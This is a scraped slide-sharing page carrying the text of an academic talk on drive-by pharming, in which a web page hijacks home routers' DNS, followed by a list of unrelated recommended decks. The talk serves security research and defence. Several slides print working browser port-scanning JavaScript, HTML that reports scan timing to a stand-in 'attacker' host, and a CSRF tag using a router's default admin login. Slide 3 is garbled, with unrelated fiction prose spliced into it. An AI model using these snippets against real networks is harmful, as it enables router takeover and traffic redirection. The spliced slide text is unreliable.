drive by pharming
play

Drive-By Pharming Sid Stamm :: Indiana University Zulfikar Ramzan - PowerPoint PPT Presentation

Jan 28, 2023 •300 likes •696 views

Drive-By Pharming Sid Stamm :: Indiana University Zulfikar Ramzan :: Symantec Corporation Markus Jakobsson :: Indiana University Phishing Phishing Following these, the cycle would start again. aylesbury beseech "Well, we'll have to talk

  1. Drive-By Pharming Sid Stamm :: Indiana University Zulfikar Ramzan :: Symantec Corporation Markus Jakobsson :: Indiana University

  2. Phishing

  3. Phishing Following these, the cycle would start again. aylesbury beseech "Well, we'll have to talk about that, won't we? What he had burned had been nothing more than an illusion with a title page on top ” blank pages interspersed with written rejects and culls. at least, not all of them. She killed him. "Her voice was rising. A jury might let you off by reason of insanity, but not me, Annie. Not that I would ever try to change your mind about anything you chose to think ” a Mister Smart Guy like you who thinks for a living. It had taken her less than twenty minutes to read his first stab at it; it had been an hour since she had taken this sheaf of twenty-one pages. caricature

  4. Phishing

  5. Crimeware More Info: http://www.apwg.org

  6. Pharming

  7. Browser Problems

  8. Browser History Snooping http://browser-recon.info

  9. Browser History Snooping http://browser-recon.info

  10. XSS

  11. CSRF http://sidstamm.com/netflixcsrf.html

  12. Host Scanning x x � evil code x x Attacking from Victim’s Browser

  13. Host Scanning window.onerror = function(msg, url) { if(!msg.match(/Error loading script/)){ serverIsLive(url); } }; for(i=0; i<255; i++) { s = document.createElement(“script”); s.src = “http://192.168.0.” + i; document.body.appendChild(s); } http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html

  14. Script-Free Scanning <img src="http://attacker/record-time/?id=a" /> <link rel="stylesheet" type="text/css" href="http://192.168.0.1/" /> <img src="http://attacker/record-time/?id=b" /> <link rel="stylesheet" type="text/css" href="http://192.168.0.2/" /> <img src="http://attacker/record-time/?id=c" /> ... http://jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning-without.html

  15. Router Woes • GET v. POST • admin:admin • partial submit • predictability

  16. Drive-By Pharming ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net ™ ISP Victim ISP’s Gateway

  17. Normal DNS Lookup ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net ™ ISP Victim ISP’s Gateway

  18. Normal DNS Lookup ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net ™ ISP LOOKUP evil.com Victim ISP’s Gateway

  19. Normal DNS Lookup ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net Evil.com= 1.1.1.1 ™ ISP LOOKUP evil.com Victim ISP’s Gateway

  20. Drive-By Attack ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net ™ ISP Victim ISP’s Gateway

  21. Drive-By Attack ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net ™ ISP GET 1.1.1.1 Victim ISP’s Gateway

  22. Pharmed DNS Lookup ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net ™ ISP Victim ISP’s Gateway

  23. Pharmed DNS Lookup ISP’s DNS Attacker’s Server DNS + Web Server ™ ISP Router’s Internal Net ™ ISP LOOKUP Victim ISP’s Gateway

  24. How This Happens POST -> GET ( PRE-ARRANGED )

  25. How This Happens <img src=“http://admin:@192.168.0.1/cfg.cgi?...”> ( CSRF )

  26. Fallout (plausible) 5.0% American Web Users JS + Default Password JS + Custom Password No JS 47.5% 47.5% SOURCES: “warkitting” paper, http://www.thecounter.com

  27. Fallout Netgear WGR614 D-Link DI-524 Linksys WRT54G

  28. Fallout Netgear WGR614 D-Link DI-524 Linksys WRT54G Cisco 806 Cisco SOHO 71 Cisco 826 Cisco SOHO 76 Cisco 827 Cisco SOHO 77 Cisco 827H Cisco SOHO 77H Cisco 827-4v Cisco SOHO 78 Cisco 828 Cisco SOHO 91 Cisco 831 Cisco SOHO 96 Cisco 836 Cisco SOHO 97 Cisco 837 ... http://www.cisco.com/warp/public/707/cisco-sr-20070215-http.shtml

  29. Router Zombie Networks?

  30. Router Zombie Networks?

  31. Viral Spread ...

  32. Viral Spread ...

  33. Countermeasures

  34. Countermeasures

  35. Countermeasures

  36. Countermeasures

  37. Countermeasures ISP

  38. Drive-By Pharming

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Google Drive: Share V0 18 Apr 2020 V0 1 V0 2 2020 Google Drive: Share 2020 Google Drive:

Google Drive: Share V0 18 Apr 2020 V0 1 V0 2 2020 Google Drive: Share 2020 Google Drive:

Google Drive: Share V0 18 Apr 2020 V0 1 V0 2 2020 Google Drive: Share 2020 Google Drive: Share Windows Explorer: Google Drive: Share Open MyDrive . Milo Schield Editor of www.StatLit.org Fellow, American Statistical Association

256 views • 7 slides
Remember When: Westmoreland Countys Drive -In Theaters Pennsylvanias Place in Drive -In

Remember When: Westmoreland Countys Drive -In Theaters Pennsylvanias Place in Drive -In

Remember When: Westmoreland Countys Drive -In Theaters Pennsylvanias Place in Drive -In History April 15, 1934: Shankweilers Auto Park in Orefield, Pennsylvania opened as the second drive-in theater in the United States.

566 views • 20 slides
DEVELOPING &amp; DEPLOYING AUTONOMOUS DRIVING APPLICATIONS WITH THE NVIDIA DRIVE PX PLATFORM

DEVELOPING &amp; DEPLOYING AUTONOMOUS DRIVING APPLICATIONS WITH THE NVIDIA DRIVE PX PLATFORM

DEVELOPING &amp; DEPLOYING AUTONOMOUS DRIVING APPLICATIONS WITH THE NVIDIA DRIVE PX PLATFORM Shri Sundaram, Product Manager, DRIVE PX Platform DRIVE PX: AV Development Platform AV Developers: DRIVE PX as your tool AV HW/SW Ecosystem: DRIVE PX

569 views • 29 slides
Protecting your Photos Mike Richards Typical Installation Laptop and basic desktop System Drive

Protecting your Photos Mike Richards Typical Installation Laptop and basic desktop System Drive

Protecting your Photos Mike Richards Typical Installation Laptop and basic desktop System Drive C: Drive Windows, programs, documents &amp; photos D: Drive DVD drive Data Drive E: Drive Backups, photos External drives for extra photos

443 views • 26 slides
1102 Commercial Drive Heritage Designation 1102 Commercial Drive The Florida Market at 1102

1102 Commercial Drive Heritage Designation 1102 Commercial Drive The Florida Market at 1102

1102 Commercial Drive Heritage Designation 1102 Commercial Drive The Florida Market at 1102 Commercial Drive 2 1102 Commercial Drive Site and Surrounding Zoning 3 1102 Commercial Drive Recently Restored 4 1102 Commercial Drive Rendering

488 views • 11 slides
LIVE IN THE CAR: INSIDE LOOK INTO AUTONOMOUS VEHICLE DRIVE MISSIONS Neda Cvijetic 1 WHAT ARE

LIVE IN THE CAR: INSIDE LOOK INTO AUTONOMOUS VEHICLE DRIVE MISSIONS Neda Cvijetic 1 WHAT ARE

LIVE IN THE CAR: INSIDE LOOK INTO AUTONOMOUS VEHICLE DRIVE MISSIONS Neda Cvijetic 1 WHAT ARE DRIVE MISSIONS? DRIVE MISSIONS = PIECES OF AV SW FUNCTIONALITY THAT TEACH THE CAR TO DRIVE ITSELF 2 DRIVE MISSIONS: PERCEPTION 3 WHAT A HUMAN SEES

709 views • 36 slides
DRIVE AHEAD DOR-TDF-3TC vs. EFV-TDF-FTC as Initial Therapy DRIVE AHEAD: Design DRIVE AHEAD:

DRIVE AHEAD DOR-TDF-3TC vs. EFV-TDF-FTC as Initial Therapy DRIVE AHEAD: Design DRIVE AHEAD:

DOR-TDF-3TC vs. EFV-TDF-FTC as Initial Therapy DRIVE AHEAD DOR-TDF-3TC vs. EFV-TDF-FTC as Initial Therapy DRIVE AHEAD: Design DRIVE AHEAD: Study Design Background : Randomized, double-blind, active- controlled, phase 3 study evaluating the

326 views • 9 slides
DRIVE MAPPING ECOSYSTEM (1) Justyna Zander, PhD March 20, 2019 NVIDIA DRIVE MAPPING Localize

DRIVE MAPPING ECOSYSTEM (1) Justyna Zander, PhD March 20, 2019 NVIDIA DRIVE MAPPING Localize

DRIVE MAPPING ECOSYSTEM (1) Justyna Zander, PhD March 20, 2019 NVIDIA DRIVE MAPPING Localize Globally, Update HD Maps, and Create MyRoute Map Creation Map Localization Map Update Using DRIVE MapStream/MapServices API Using DRIVE Localization

320 views • 12 slides
INTERNATIONAL DRIVE T R A N S I T F E A S I B I L I T Y &amp; A LT E R N AT I V E T E C H N O

INTERNATIONAL DRIVE T R A N S I T F E A S I B I L I T Y &amp; A LT E R N AT I V E T E C H N O

INTERNATIONAL DRIVE T R A N S I T F E A S I B I L I T Y &amp; A LT E R N AT I V E T E C H N O LO G Y A S S E S S M E N T 1 I-DRIVE TFATA OVERVIEW I N T E R N A T I O N A L D R I V E 2 0 4 0 S T R A T E G I C V I S I O N I-DRIVE

664 views • 20 slides
Google Drive Tony Trego Glenn Brickel Cody Gaugler What Is It? Google Drive is a safe place to

Google Drive Tony Trego Glenn Brickel Cody Gaugler What Is It? Google Drive is a safe place to

Wifi Join: WMCTC Guest Google Drive Tony Trego Glenn Brickel Cody Gaugler What Is It? Google Drive is a safe place to save all your files on the internet, so you can access them from anywhere in the world Getting Started With Drive Create

445 views • 7 slides
WILES ROAD FROM UNIVERSITY DRIVE TO RIVERSIDE DRIVE SOLICITATION NO. R2113749P1 Oral

WILES ROAD FROM UNIVERSITY DRIVE TO RIVERSIDE DRIVE SOLICITATION NO. R2113749P1 Oral

1 DESIGN SERVICES FOR: WILES ROAD FROM UNIVERSITY DRIVE TO RIVERSIDE DRIVE SOLICITATION NO. R2113749P1 Oral Presentation: May 12, 2017 2 Lochner Overview Who We Are Our Team Project Manager Manuel Sauleda, PE Key

915 views • 23 slides
INTRODUCTION AND INTEGRATION OF DRIVEWORKS ON DRIVE PX2 Aaraadhya Narra, Alessandro Ferrari WHAT

INTRODUCTION AND INTEGRATION OF DRIVEWORKS ON DRIVE PX2 Aaraadhya Narra, Alessandro Ferrari WHAT

INTRODUCTION AND INTEGRATION OF DRIVEWORKS ON DRIVE PX2 Aaraadhya Narra, Alessandro Ferrari WHAT WILL YOU LEARN IN THIS LAB? Overview Introduction to Drive PX2 Hardware setup with Drive PX2 Developing with Driveworks on Drive PX2 2 GETTING

572 views • 45 slides
GOOGLE DRIVE AS A RESEARCH TOOL Curtis Lauterbach Using Drive as a Research Tool Using

GOOGLE DRIVE AS A RESEARCH TOOL Curtis Lauterbach Using Drive as a Research Tool Using

GOOGLE DRIVE AS A RESEARCH TOOL Curtis Lauterbach Using Drive as a Research Tool Using Google Drive you have the option: Ask different questions View/obtain results in real time Download results in different formats View

697 views • 35 slides
NVIDIA DRIVE December 2019 DRIVE PLATFORM Mass production INDUSTRY / MARKET SAFETY TECHNOLOGY

NVIDIA DRIVE December 2019 DRIVE PLATFORM Mass production INDUSTRY / MARKET SAFETY TECHNOLOGY

NVIDIA DRIVE December 2019 DRIVE PLATFORM Mass production INDUSTRY / MARKET SAFETY TECHNOLOGY REGULATIONS NVIDIA CONFIDENTIAL. DO NOT DISTRIBUTE. 2 THE DRIVE INITIATIVE End-to-End, Open Platform for Building Autonomous Vehicles DGX

1.07k views • 74 slides
Intelligent Asset Management for Utilities Andrew Evans Topcon Walk or Drive? Drive! Cost

Intelligent Asset Management for Utilities Andrew Evans Topcon Walk or Drive? Drive! Cost

Intelligent Asset Management for Utilities Andrew Evans Topcon Walk or Drive? Drive! Cost Duration Coverage Simplicity Safety Deliver Quickly Map Extract Deliver Navigating the Infobahn Update Regularly Utility

351 views • 20 slides
International Drive District Public Safety Plan I-Drive General Information 2016 68

International Drive District Public Safety Plan I-Drive General Information 2016 68

International Drive District Public Safety Plan I-Drive General Information 2016 68 million visitors last year to Orange County Orange County I-Drive - 13 million visitors - 75,000 employees - 12,000 residents Sector 5 114,927

92 views • 7 slides
Trust but verify: Why and how to establish trust in embedded devices Aurlien Francillon This

Trust but verify: Why and how to establish trust in embedded devices Aurlien Francillon This

Trust but verify: Why and how to establish trust in embedded devices Aurlien Francillon This talk Introduction Economic aspects Why make secure products? Trust in embedded devices Verifying trust Conclusion Aurlien

649 views • 37 slides
ASTR 1120 General Astronomy: The SUN ast Tim Stars &amp; Galaxies How far is the Sun?

ASTR 1120 General Astronomy: The SUN ast Tim Stars &amp; Galaxies How far is the Sun?

ASTR 1120 General Astronomy: The SUN ast Tim Stars &amp; Galaxies How far is the Sun? NNOUNCEMENTS What is the Sun made of? FIRST MIDTERM THIS THURSDAY, 09/17 How does the Sun produce its energy? ex observing night Tue

271 views • 8 slides
Supplemental Information Third Quarter Earnings Call 2011 Market &amp; Financial Overview

Supplemental Information Third Quarter Earnings Call 2011 Market &amp; Financial Overview

Supplemental Information Third Quarter Earnings Call 2011 Market &amp; Financial Overview Capital Values $ $

584 views • 19 slides
Real World Cryptography 2015 London, UK, 7-9 January 2015

Real World Cryptography 2015 London, UK, 7-9 January 2015

Real World Cryptography 2015 London, UK, 7-9 January 2015 www.realworldcrypto.com/rwc2015 #realworldcrypto Welcoming Remarks Fire safety Lightning talks

338 views • 8 slides
CS4980: Computational Epidemiology Sriram Pemmaraju and Alberto Maria Segre Department of

CS4980: Computational Epidemiology Sriram Pemmaraju and Alberto Maria Segre Department of

CS4980: Computational Epidemiology Sriram Pemmaraju and Alberto Maria Segre Department of Computer Science The University of Iowa Spring 2020 https://homepage.cs.uiowa.edu/sriram/4980/spring20/ Hospital-Acquired Infections Over the last 10

1.4k views • 77 slides
Arturo Rinaldi LininoOS, LininoIO and ArduinoOS : a suitable ecosystem for Linux and MCUs Quick

Arturo Rinaldi LininoOS, LininoIO and ArduinoOS : a suitable ecosystem for Linux and MCUs Quick

Arturo Rinaldi LininoOS, LininoIO and ArduinoOS : a suitable ecosystem for Linux and MCUs Quick Bio Who am I ? Senior So fu ware Engineer, working for Arduino Srl since 2014 My main tasks : Linino distro (embedded linux distro) maintaining

759 views • 49 slides
Forbush Decrease Johan von Forstner

Forbush Decrease Johan von Forstner

Forbush Decrease Johan von Forstner Outline 1. Solar modulation of cosmic ray intensity 2. Forbush decrease introduction to CME and its

444 views • 27 slides
CS 335 Software Development Introduction Jan 13, 2014 Healthcare.gov must verify a would-be

CS 335 Software Development Introduction Jan 13, 2014 Healthcare.gov must verify a would-be

CS 335 Software Development Introduction Jan 13, 2014 Healthcare.gov must verify a would-be applicants eligibility from Homeland Security, IRS and Social Security systems, in real time, plus enroll members electronically to any

346 views • 8 slides

More recommend